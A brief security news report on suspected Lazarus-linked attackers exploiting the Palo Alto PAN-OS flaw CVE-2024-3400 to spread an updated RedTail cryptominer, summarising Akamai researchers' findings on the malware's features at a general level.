New RedTail cryptominer attacks involve Palo Alto firewall exploit

Vulnerable Palo Alto Networks PAN-OS firewalls impacted by the flaw, tracked as CVE-2024-3400, have been targeted by suspected Lazarus Group-linked threat actors to distribute an updated version of the RedTail cryptocurrency mining malware since late April, according to Security Boulevard.

Significant improvements have been made with the updated RedTail cryptominer, including the integration of an encrypted mining configuration and attackers' use of proprietary mining pools or pool proxies, which indicate the sophistication of the new operation, a report from Akamai showed. Operators of the malware have also added self-process debugging and a cron job to better evade analysis and bolster persistence after system reboots, researchers noted.

"There are many glossy cryptominers out there, but seeing one with this level of polish is uncommon. The investments required to run a private cryptomining operation are significant, including staffing, infrastructure, and obfuscation. This sophistication may be indicative of a nation-state-sponsored attack group," added researchers.